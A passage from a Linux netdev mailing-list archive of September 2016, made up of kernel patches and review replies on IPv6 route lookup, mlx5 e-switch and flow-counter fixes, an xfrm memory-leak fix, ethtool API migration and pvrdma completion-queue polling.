+   {"bpf_app3_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP3_FRAMES)},
+   {"bpf_app3_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP3_BYTES)},
 };
 
 #define NN_ET_GLOBAL_STATS_LEN ARRAY_SIZE(nfp_net_et_stat

Re: [v2] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread David Ahern

On 9/16/16 2:33 PM, Vincent Bernat wrote:
> Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
> lookups") introduced a regression: insertion of an IPv6 route in a table
> not containing the appropriate connected route for the gateway but which
> contained a non-connected route (like a default gateway) fails while it
> was previously working:
> 
> $ ip link add eth0 type dummy
> $ ip link set up dev eth0
> $ ip addr add 2001:db8::1/64 dev eth0
> $ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> RTNETLINK answers: No route to host
> $ ip -6 route show table 20
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> After this patch, we get:
> 
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> $ ip -6 route show table 20
> 2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 

need an explicit Fixes tag here:

Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")

> Signed-off-by: Vincent Bernat 
> ---
>  net/ipv6/route.c | 8 
>  1 file changed, 8 insertions(+)
> 
> diff --git a/net/ipv6/route.c b/net/ipv6/route.c
> index ad4a7ff301fc..2c6c7257ff75 100644
> --- a/net/ipv6/route.c
> +++ b/net/ipv6/route.c
> @@ -1994,6 +1994,14 @@ static struct rt6_info *ip6_route_info_create(struct 
> fib6_config *cfg)
>   if (cfg->fc_table)
>   grt = ip6_nh_lookup_table(net, cfg, gw_addr);
>  
> + if (grt) {
> + if (grt->rt6i_flags & RTF_GATEWAY ||
> + (dev && dev != grt->dst.dev)) {
> + ip6_rt_put(grt);
> + grt = NULL;
> + }
> + }
> +

The if grt check needs to be under the 'if (cfg->fc_table)'


>   if (!grt)
>   grt = rt6_lookup(net, gw_addr, NULL,
>cfg->fc_ifindex, 1);
>

[PATCHv6 net-next 13/15] net: act_mirred: allow statistic updates from offloaded actions

2016-09-18 Thread Jakub Kicinski

Implement .stats_update() callback.  The implementation
is generic and can be reused by other simple actions if
needed.

Signed-off-by: Jakub Kicinski 
---
 net/sched/act_mirred.c | 8 
 1 file changed, 8 insertions(+)

diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
index 6038c85d92f5..f9862d89cb93 100644
--- a/net/sched/act_mirred.c
+++ b/net/sched/act_mirred.c
@@ -204,6 +204,13 @@ static int tcf_mirred(struct sk_buff *skb, const struct 
tc_action *a,
return retval;
 }
 
+static void tcf_stats_update(struct tc_action *a, u64 bytes, u32 packets,
+u64 lastuse)
+{
+   tcf_lastuse_update(&a->tcfa_tm);
+   _bstats_cpu_update(this_cpu_ptr(a->cpu_bstats), bytes, packets);
+}
+
 static int tcf_mirred_dump(struct sk_buff *skb, struct tc_action *a, int bind, 
int ref)
 {
unsigned char *b = skb_tail_pointer(skb);
@@ -280,6 +287,7 @@ static struct tc_action_ops act_mirred_ops = {
.type   =   TCA_ACT_MIRRED,
.owner  =   THIS_MODULE,
.act=   tcf_mirred,
+   .stats_update   =   tcf_stats_update,
.dump   =   tcf_mirred_dump,
.cleanup=   tcf_mirred_release,
.init   =   tcf_mirred_init,
-- 
1.9.1

[PATCH] net: ethernet: broadcom: bcmgenet: use new api ethtool_{get|set}_link_ksettings

2016-09-18 Thread Philippe Reynes

The ethtool API {get|set}_settings is deprecated.
Move this driver to the new API {get|set}_link_ksettings.

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/genet/bcmgenet.c |   16 
 1 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c 
b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
index 46f9043..2013474 100644
--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
@@ -450,8 +450,8 @@ static inline void bcmgenet_rdma_ring_writel(struct 
bcmgenet_priv *priv,
genet_dma_ring_regs[r]);
 }
 
-static int bcmgenet_get_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcmgenet_get_link_ksettings(struct net_device *dev,
+  struct ethtool_link_ksettings *cmd)
 {
if (!netif_running(dev))
return -EINVAL;
@@ -459,11 +459,11 @@ static int bcmgenet_get_settings(struct net_device *dev,
if (!dev->phydev)
return -ENODEV;
 
-   return phy_ethtool_gset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_get(dev->phydev, cmd);
 }
 
-static int bcmgenet_set_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcmgenet_set_link_ksettings(struct net_device *dev,
+  const struct ethtool_link_ksettings *cmd)
 {
if (!netif_running(dev))
return -EINVAL;
@@ -471,7 +471,7 @@ static int bcmgenet_set_settings(struct net_device *dev,
if (!dev->phydev)
return -ENODEV;
 
-   return phy_ethtool_sset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_set(dev->phydev, cmd);
 }
 
 static int bcmgenet_set_rx_csum(struct net_device *dev,
@@ -977,8 +977,6 @@ static const struct ethtool_ops bcmgenet_ethtool_ops = {
.get_strings= bcmgenet_get_strings,
.get_sset_count = bcmgenet_get_sset_count,
.get_ethtool_stats  = bcmgenet_get_ethtool_stats,
-   .get_settings   = bcmgenet_get_settings,
-   .set_settings   = bcmgenet_set_settings,
.get_drvinfo= bcmgenet_get_drvinfo,
.get_link   = ethtool_op_get_link,
.get_msglevel   = bcmgenet_get_msglevel,
@@ -990,6 +988,8 @@ static const struct ethtool_ops bcmgenet_ethtool_ops = {
.nway_reset = bcmgenet_nway_reset,
.get_coalesce   = bcmgenet_get_coalesce,
.set_coalesce   = bcmgenet_set_coalesce,
+   .get_link_ksettings = bcmgenet_get_link_ksettings,
+   .set_link_ksettings = bcmgenet_set_link_ksettings,
 };
 
 /* Power down the unimac, based on mode. */
-- 
1.7.4.4

[PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Or Gerlitz

From: Roi Dayan 

The FW command output length should be only the length of the out
field of struct mlx5_cmd_fc_bulk. Failing to do so causes the memcpy
call, which is invoked later in the driver, to write over the wrong
memory address and corrupt kernel memory, which results in random crashes.

This bug was found using the kernel address sanitizer (kasan).

Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
Signed-off-by: Roi Dayan 
Signed-off-by: Or Gerlitz 
---
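Note (illustration only, not part of the patch): a userspace sketch of
the sizing rule the fix restores.  The recorded output length covers
only the trailing buffer, while the allocation covers header plus
buffer.  struct bulk_sketch and the two byte-size macros are
hypothetical placeholders, not the real mlx5 layout.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define SKETCH_HDR_BYTES 16 /* hypothetical query header size */
#define SKETCH_CTR_BYTES 16 /* hypothetical per-counter size  */

struct bulk_sketch {
	int num;
	size_t outlen;       /* length of out[] only, not of the struct */
	unsigned char out[]; /* firmware output lands here */
};

static struct bulk_sketch *bulk_alloc(int num)
{
	size_t outlen = SKETCH_HDR_BYTES + SKETCH_CTR_BYTES * (size_t)num;
	struct bulk_sketch *b = calloc(1, sizeof(*b) + outlen);

	if (!b)
		return NULL;

	b->num = num;
	b->outlen = outlen; /* later copies must be bounded by this */
	return b;
}
```

If outlen also included sizeof(*b), a later copy of outlen bytes into
out[] would run past the end of the allocation.
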
 drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c 
b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
index 9134010..287ade1 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
@@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
 mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
 {
struct mlx5_cmd_fc_bulk *b;
-   int outlen = sizeof(*b) +
+   int outlen =
MLX5_ST_SZ_BYTES(query_flow_counter_out) +
MLX5_ST_SZ_BYTES(traffic_counter) * num;
 
-   b = kzalloc(outlen, GFP_KERNEL);
+   b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
if (!b)
return NULL;
 
-- 
2.3.7

[PATCH net 3/3] net/mlx5: E-Switch, Handle mode change failures

2016-09-18 Thread Or Gerlitz

E-switch mode changes involve creating HW tables, potentially allocating
netdevices, etc., and things can fail. Add an attempt to roll back to the
existing mode when changing to the new mode fails. Only if the rollback
also fails does getting proper SRIOV functionality require a module unload
or SRIOV disablement/enablement.

Signed-off-by: Or Gerlitz 
---
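Note (illustration only, not part of the patch): the rollback pattern in
isolation.  All names are hypothetical; fail_offloads() is a stub that
exists only to exercise the failure path, and -5 is an arbitrary error
value.

```c
#include <assert.h>

enum mode_sketch { MODE_NONE, MODE_LEGACY, MODE_OFFLOADS };

typedef int (*enable_fn)(enum mode_sketch mode);

/* Try to enter new_mode; on failure try to restore old_mode.
 * Returns the error of the first attempt (0 on success).
 * *rollback_err receives the result of the rollback attempt, or 0 if
 * no rollback was needed.
 */
static int switch_mode(enable_fn enable, enum mode_sketch old_mode,
		       enum mode_sketch new_mode, int *rollback_err)
{
	int err;

	*rollback_err = 0;
	err = enable(new_mode);
	if (err)
		*rollback_err = enable(old_mode);

	return err;
}

/* Stub for demonstration: entering offloads mode always fails. */
static int fail_offloads(enum mode_sketch mode)
{
	return mode == MODE_OFFLOADS ? -5 : 0;
}
```

Keeping the two error values separate makes it possible to report the
rollback failure with its own code rather than the original one.
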
 .../ethernet/mellanox/mlx5/core/eswitch_offloads.c   | 20 ++--
 1 file changed, 14 insertions(+), 6 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
index 3dc83a9..7de40e6 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
@@ -446,7 +446,7 @@ out:
 
 static int esw_offloads_start(struct mlx5_eswitch *esw)
 {
-   int err, num_vfs = esw->dev->priv.sriov.num_vfs;
+   int err, err1, num_vfs = esw->dev->priv.sriov.num_vfs;
 
if (esw->mode != SRIOV_LEGACY) {
esw_warn(esw->dev, "Can't set offloads mode, SRIOV legacy not 
enabled\n");
@@ -455,8 +455,12 @@ static int esw_offloads_start(struct mlx5_eswitch *esw)
 
mlx5_eswitch_disable_sriov(esw);
err = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_OFFLOADS);
-   if (err)
-   esw_warn(esw->dev, "Failed set eswitch to offloads, err %d\n", 
err);
+   if (err) {
+   esw_warn(esw->dev, "Failed setting eswitch to offloads, err 
%d\n", err);
+   err1 = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_LEGACY);
+   if (err1)
+   esw_warn(esw->dev, "Failed setting eswitch back to 
legacy, err %d\n", err1);
+   }
return err;
 }
 
@@ -508,12 +512,16 @@ create_ft_err:
 
 static int esw_offloads_stop(struct mlx5_eswitch *esw)
 {
-   int err, num_vfs = esw->dev->priv.sriov.num_vfs;
+   int err, err1, num_vfs = esw->dev->priv.sriov.num_vfs;
 
mlx5_eswitch_disable_sriov(esw);
err = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_LEGACY);
-   if (err)
-   esw_warn(esw->dev, "Failed set eswitch legacy mode. err %d\n", 
err);
+   if (err) {
+   esw_warn(esw->dev, "Failed setting eswitch to legacy, err 
%d\n", err);
+   err1 = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_OFFLOADS);
+   if (err1)
+   esw_warn(esw->dev, "Failed setting eswitch back to 
offloads, err %d\n", err1);
+   }
 
return err;
 }
-- 
2.3.7

[PATCH net 0/3] mlx5 fixes to 4.8-rc6

2016-09-18 Thread Or Gerlitz

Hi Dave, 

This series has a fix from Roi for a memory corruption bug in 
the bulk flow counters code and two late and hopefully last fixes 
from me to the new eswitch offloads code.

Series done over net commit 37dd348 "bna: fix crash in bnad_get_strings()"

Or.

Or Gerlitz (2):
  net/mlx5: E-Switch, Fix error flow in the SRIOV e-switch init code
  net/mlx5: E-Switch, Handle mode change failures

Roi Dayan (1):
  net/mlx5: Fix flow counter bulk command out mailbox allocation

 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c|  1 +
 .../ethernet/mellanox/mlx5/core/eswitch_offloads.c   | 20 ++--
 drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c |  4 ++--
 3 files changed, 17 insertions(+), 8 deletions(-)

-- 
2.3.7

[PATCH net 2/3] net/mlx5: E-Switch, Fix error flow in the SRIOV e-switch init code

2016-09-18 Thread Or Gerlitz

When enablement of the SRIOV e-switch in a certain mode (switchdev or legacy)
fails, we must set the mode to none. Otherwise, we'll run into double-free
based crashes when further attempting to deal with the e-switch (such
as when disabling SRIOV or unloading the driver).

Signed-off-by: Or Gerlitz 
---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
index 8b78f15..b247949 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
@@ -1554,6 +1554,7 @@ int mlx5_eswitch_enable_sriov(struct mlx5_eswitch *esw, 
int nvfs, int mode)
 
 abort:
esw_enable_vport(esw, 0, UC_ADDR_CHANGE);
+   esw->mode = SRIOV_NONE;
return err;
 }
 
-- 
2.3.7

Re: [PATCHv6 net-next 08/15] nfp: add BPF to NFP code translator

2016-09-18 Thread Daniel Borkmann


On 09/18/2016 05:09 PM, Jakub Kicinski wrote:

Add translator for JITing eBPF to operations which
can be executed on NFP's programmable engines.

Signed-off-by: Jakub Kicinski 
---
v6:
  - explicitly check for registers >= MAX_BPF_REG;
  - fix mem leak.


Set looks good to me now, thanks a lot Jakub!


v4:
  - use bitfield.h directly.
v3:
  - don't clone the program for the verifier (no longer needed);
  - temporarily add a local copy of macros from bitfield.h.

[v3] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread Vincent Bernat

Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
lookups") introduced a regression: insertion of an IPv6 route in a table
not containing the appropriate connected route for the gateway but which
contained a non-connected route (like a default gateway) fails while it
was previously working:

$ ip link add eth0 type dummy
$ ip link set up dev eth0
$ ip addr add 2001:db8::1/64 dev eth0
$ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
$ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
RTNETLINK answers: No route to host
$ ip -6 route show table 20
default via 2001:db8::5 dev eth0  metric 1024  pref medium

After this patch, we get:

$ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
$ ip -6 route show table 20
2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
default via 2001:db8::5 dev eth0  metric 1024  pref medium

Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: Vincent Bernat 
---
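Note (illustration only, not part of the patch): the fallback decision
in isolation.  The structs, the flag value and both helper names are
hypothetical; the sketch only mirrors the condition added in the diff
(discard a table result that is itself a gateway route or that points at
a different device, then use the full lookup result instead).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define SKETCH_F_GATEWAY 0x1u /* illustrative flag, not the kernel value */

struct dev_sketch {
	int ifindex;
};

struct route_sketch {
	unsigned int flags;
	const struct dev_sketch *dev;
};

/* True if the per-table lookup result can serve as the nexthop route. */
static bool table_route_usable(const struct route_sketch *grt,
			       const struct dev_sketch *dev)
{
	if (!grt)
		return false;
	if (grt->flags & SKETCH_F_GATEWAY)
		return false;
	if (dev && dev != grt->dev)
		return false;
	return true;
}

/* Prefer the table result, otherwise fall back to the full lookup. */
static const struct route_sketch *
pick_nexthop_route(const struct route_sketch *table_rt,
		   const struct route_sketch *full_rt,
		   const struct dev_sketch *dev)
{
	return table_route_usable(table_rt, dev) ? table_rt : full_rt;
}
```

In the reproducer above, table 20 only holds the default route, which is
a gateway route, so the full lookup result is used.
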
 net/ipv6/route.c | 11 ++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/route.c b/net/ipv6/route.c
index ad4a7ff301fc..ec33c6d7eed5 100644
--- a/net/ipv6/route.c
+++ b/net/ipv6/route.c
@@ -1991,9 +1991,18 @@ static struct rt6_info *ip6_route_info_create(struct 
fib6_config *cfg)
if (!(gwa_type & IPV6_ADDR_UNICAST))
goto out;
 
-   if (cfg->fc_table)
+   if (cfg->fc_table) {
grt = ip6_nh_lookup_table(net, cfg, gw_addr);
 
+   if (grt) {
+   if (grt->rt6i_flags & RTF_GATEWAY ||
+   (dev && dev != grt->dst.dev)) {
+   ip6_rt_put(grt);
+   grt = NULL;
+   }
+   }
+   }
+
if (!grt)
grt = rt6_lookup(net, gw_addr, NULL,
 cfg->fc_ifindex, 1);
-- 
2.9.3

Re: [v3] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread David Ahern

On 9/18/16 9:46 AM, Vincent Bernat wrote:
> Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
> lookups") introduced a regression: insertion of an IPv6 route in a table
> not containing the appropriate connected route for the gateway but which
> contained a non-connected route (like a default gateway) fails while it
> was previously working:
> 
> $ ip link add eth0 type dummy
> $ ip link set up dev eth0
> $ ip addr add 2001:db8::1/64 dev eth0
> $ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> RTNETLINK answers: No route to host
> $ ip -6 route show table 20
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> After this patch, we get:
> 
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> $ ip -6 route show table 20
> 2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")
> Signed-off-by: Vincent Bernat 
> ---
>  net/ipv6/route.c | 11 ++-
>  1 file changed, 10 insertions(+), 1 deletion(-)

Acked-by: David Ahern 
Tested-by: David Ahern

Re: [PATCHv4 next 3/3] ipvlan: Introduce l3s mode

2016-09-18 Thread David Ahern

On 9/16/16 1:59 PM, Mahesh Bandewar wrote:
> From: Mahesh Bandewar 
> 
> In a typical IPvlan L3 setup where master is in default-ns and
> each slave is into different (slave) ns. In this setup egress
> packet processing for traffic originating from slave-ns will
> hit all NF_HOOKs in slave-ns as well as default-ns. However same
> is not true for ingress processing. All these NF_HOOKs are
> hit only in the slave-ns skipping them in the default-ns.
> IPvlan in L3 mode is restrictive and if admins want to deploy
> iptables rules in default-ns, this asymmetric data path makes it
> impossible to do so.
> 
> This patch makes use of the l3_rcv() (added as part of l3mdev
> enhancements) to perform input route lookup on RX packets without
> changing the skb->dev and then uses nf_hook at NF_INET_LOCAL_IN
> to change the skb->dev just before handing over skb to L4.

Today's l3 mode only allows netfilter Rx rules on ipvlan devices in slave-ns 
since skb->dev is changed to ipvlan device and the namespace crossing happens 
in rx-handler.

This new l3s mode only allows Rx rules on the parent devices (e.g., eth1) in the
default-ns since skb->dev stays as parent device until the NF_HOOK is run. 
Specifically, you can't put rules on eth1 and ipvl0 since the packet never goes 
through L3 with the ipvlan device set?

So the 'symmetric' is with respect to the parent device in the default-ns.

Also, there is no longer an explicit namespace crossing; that happens via the 
route lookup and setting dst on the skb. I guess for this use case it is ok.

> 
> Signed-off-by: Mahesh Bandewar 
> CC: David Ahern 
> ---
>  Documentation/networking/ipvlan.txt |  7 ++-
>  drivers/net/Kconfig |  1 +
>  drivers/net/ipvlan/ipvlan.h |  6 +++
>  drivers/net/ipvlan/ipvlan_core.c| 94 
> +
>  drivers/net/ipvlan/ipvlan_main.c| 87 +++---
>  include/uapi/linux/if_link.h|  1 +
>  6 files changed, 188 insertions(+), 8 deletions(-)

Reviewed-by: David Ahern

Re: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues

2016-09-18 Thread Leon Romanovsky

On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> Hi Adit,
> Please see my comments inline.
>
> Besides that I have no more comment for this patch.
>
> Reviewed-by: Yuval Shaia 
>
> Yuval
>
> On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > +
> > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp **cur_qp,
> > > > +  struct ib_wc *wc)
> > > > +{
> > > > +   struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > +   int has_data;
> > > > +   unsigned int head;
> > > > +   bool tried = false;
> > > > +   struct pvrdma_cqe *cqe;
> > > > +
> > > > +retry:
> > > > +   has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > +   cq->ibcq.cqe, &head);
> > > > +   if (has_data == 0) {
> > > > +   if (tried)
> > > > +   return -EAGAIN;
> > > > +
> > > > +   /* Pass down POLL to give physical HCA a chance to poll. */
> > > > +   pvrdma_write_uar_cq(dev, cq->cq_handle | PVRDMA_UAR_CQ_POLL);
> > > > +
> > > > +   tried = true;
> > > > +   goto retry;
> > > > +   } else if (has_data == PVRDMA_INVALID_IDX) {
> > >
> > > I didn't go through the entire life cycle of the RX ring's head and tail,
> > > but you need to make sure that the PVRDMA_INVALID_IDX error is a
> > > recoverable one, i.e. there is a chance that the next call to
> > > pvrdma_poll_one will be fine. Otherwise it is an endless loop.
> >
> > We have never run into this issue internally but I don't think we can
> > recover here
>
> I briefly reviewed the life cycle of the RX ring's head and tail and didn't
> catch any suspicious place that might corrupt it.
> So I'm glad to see that you never encountered this case.
>
> > in the driver. The only way to recover would be to destroy and recreate the
> > CQ, which we shouldn't do since it could be used by multiple QPs.
>
> Agree.
> But don't they hit the same problem too?
>
> > We don't have a way yet to recover in the device. Once we add that, this
> > check should go away.
>
> To be honest, I have no idea how to do that; I was expecting the drivers'
> vendors to come up with ideas :)
> I once came up with an idea to force a restart of the driver but it was
> rejected.
>
> >
> > The reason I returned an error value from poll_cq in v3 was to break the
> > possible loop so that it might give clients a chance to recover. But since
> > poll_cq is not expected to fail I just log the device error here. I can
> > revert to that version if you want to break the possible loop.
>
> Clients (ULPs) cannot recover from this case. They do not even check the
> reason for the error and treat any error as -EAGAIN.

It is because poll_one is not expected to fail.
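
The retry-once shape of the quoted pvrdma_poll_one() can be modelled in plain userspace C. This is only a sketch under stated assumptions: struct demo_ring, demo_kick() and demo_poll_one() are hypothetical stand-ins, not the pvrdma structures or its doorbell write, and the PVRDMA_INVALID_IDX case discussed above is deliberately left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for a completion ring; not the pvrdma layout. */
struct demo_ring {
	int pending;	/* completions already visible to the consumer */
	int hidden;	/* completions that only show up after a kick */
	int kicks;	/* how many times the doorbell was rung */
};

/* Models the doorbell write: the "device" publishes hidden completions. */
static void demo_kick(struct demo_ring *r)
{
	r->kicks++;
	r->pending += r->hidden;
	r->hidden = 0;
}

/* Returns 0 if one completion was consumed, -EAGAIN if the ring stays empty. */
int demo_poll_one(struct demo_ring *r)
{
	bool tried = false;

	assert(r != NULL);
	for (;;) {
		if (r->pending > 0) {
			r->pending--;
			return 0;
		}
		if (tried)
			return -EAGAIN;	/* still empty after one kick: give up */
		demo_kick(r);
		tried = true;
	}
}
```

The point of the single `tried` flag is that an empty ring costs at most one extra doorbell per call, so the caller sees -EAGAIN instead of spinning.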


[PATCH net] xfrm: Fix memory leak of aead algorithm name

2016-09-18 Thread Ilan Tayari

commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
introduced aead. The function attach_aead kmemdup()s the algorithm
name during xfrm_state_construct().
However this memory is never freed.
Implementation has since been slightly modified in
commit ee5c23176fcc ("xfrm: Clone states properly on migration")
without resolving this leak.
This patch adds a kfree() call for the aead algorithm name.

Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
Signed-off-by: Ilan Tayari 
---
 net/xfrm/xfrm_state.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
index 9895a8c..a30f898d 100644
--- a/net/xfrm/xfrm_state.c
+++ b/net/xfrm/xfrm_state.c
@@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
 {
tasklet_hrtimer_cancel(&x->mtimer);
del_timer_sync(&x->rtimer);
+   kfree(x->aead);
kfree(x->aalg);
kfree(x->ealg);
kfree(x->calg);
-- 
1.8.3.1
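
The rule behind this fix (every field duplicated at construction time needs a matching release at destruction time) can be checked in a userspace sketch. Everything here is an assumption made for illustration: struct demo_state, demo_dup() and the allocation counter are hypothetical and do not mirror struct xfrm_state beyond the four field names visible in the diff.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

static int demo_live_allocs;	/* allocations not yet released */

/* Counted duplicate of a string, standing in for a kernel-side copy. */
static char *demo_dup(const char *s)
{
	size_t n = strlen(s) + 1;
	char *p = malloc(n);

	if (p) {
		memcpy(p, s, n);
		demo_live_allocs++;
	}
	return p;
}

/* Counted release; NULL is accepted, like kfree(NULL). */
static void demo_free(char *p)
{
	if (p) {
		demo_live_allocs--;
		free(p);
	}
}

struct demo_state {
	char *aead;
	char *aalg;
	char *ealg;
	char *calg;
};

/* Duplicates the aead name; returns 0 on success, -1 on allocation failure. */
int demo_state_construct(struct demo_state *x, const char *aead_name)
{
	assert(x != NULL && aead_name != NULL);
	memset(x, 0, sizeof(*x));
	x->aead = demo_dup(aead_name);
	return x->aead ? 0 : -1;
}

/* Releases every owned field, including aead. */
void demo_state_destroy(struct demo_state *x)
{
	demo_free(x->aead);	/* the release the patch adds */
	demo_free(x->aalg);
	demo_free(x->ealg);
	demo_free(x->calg);
	memset(x, 0, sizeof(*x));
}

/* Number of allocations still outstanding. */
int demo_live(void)
{
	return demo_live_allocs;
}
```

Dropping the first demo_free() call in demo_state_destroy() leaves demo_live() at 1 after destruction, which is the leak described above.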

Re: [net-next PATCH v3 2/3] e1000: add initial XDP support

2016-09-18 Thread Jesper Dangaard Brouer

On Mon, 12 Sep 2016 16:46:08 -0700
Eric Dumazet  wrote:

> This XDP_TX thing was one of the XDP marketing stuff, but there is
> absolutely no documentation on it, warning users about possible
> limitations/outcomes.

I will take care of documentation for the XDP project.

-- 
Best regards,
  Jesper Dangaard Brouer
  MSc.CS, Principal Kernel Engineer at Red Hat
  Author of http://www.iptv-analyzer.org
  LinkedIn: http://www.linkedin.com/in/brouer

Re: [PATCH net] xfrm: Fix memory leak of aead algorithm name

2016-09-18 Thread Rami Rosen

Acked-by: Rami Rosen 

On 18 September 2016 at 10:42, Ilan Tayari  wrote:
> commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> introduced aead. The function attach_aead kmemdup()s the algorithm
> name during xfrm_state_construct().
> However this memory is never freed.
> Implementation has since been slightly modified in
> commit ee5c23176fcc ("xfrm: Clone states properly on migration")
> without resolving this leak.
> This patch adds a kfree() call for the aead algorithm name.
>
> Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> Signed-off-by: Ilan Tayari 
> ---
>  net/xfrm/xfrm_state.c | 1 +
>  1 file changed, 1 insertion(+)
>
> diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
> index 9895a8c..a30f898d 100644
> --- a/net/xfrm/xfrm_state.c
> +++ b/net/xfrm/xfrm_state.c
> @@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
>  {
> tasklet_hrtimer_cancel(&x->mtimer);
> del_timer_sync(&x->rtimer);
> +   kfree(x->aead);
> kfree(x->aalg);
> kfree(x->ealg);
> kfree(x->calg);
> --
> 1.8.3.1
>

Re: [PATCH iproute2] vxlan: allow specifying multiple default destinations

2016-09-18 Thread Tomasz Chmielewski


Signed-off-by: Mike Rapoport 
---
This patch depends on the pending changes to ip/iplink_vxlan.c as
well as on IPv6 support in vxlan. I'll rebase and resend it once all
the changes to vxlan are merged.


Was this one (and related) ever merged?

Full thread here:

http://marc.info/?t=13668879056&r=1&w=4



Tomasz Chmielewski
https://lxadm.com

Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Leon Romanovsky

On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
> From: Roi Dayan 
>
> The FW command output length should be only the length of struct
> mlx5_cmd_fc_bulk out field. Failing to do so will cause the memcpy
> call which is invoked later in the driver to write over wrong memory
> address and corrupt kernel memory which results in random crashes.
>
> This bug was found using the kernel address sanitizer (kasan).
>
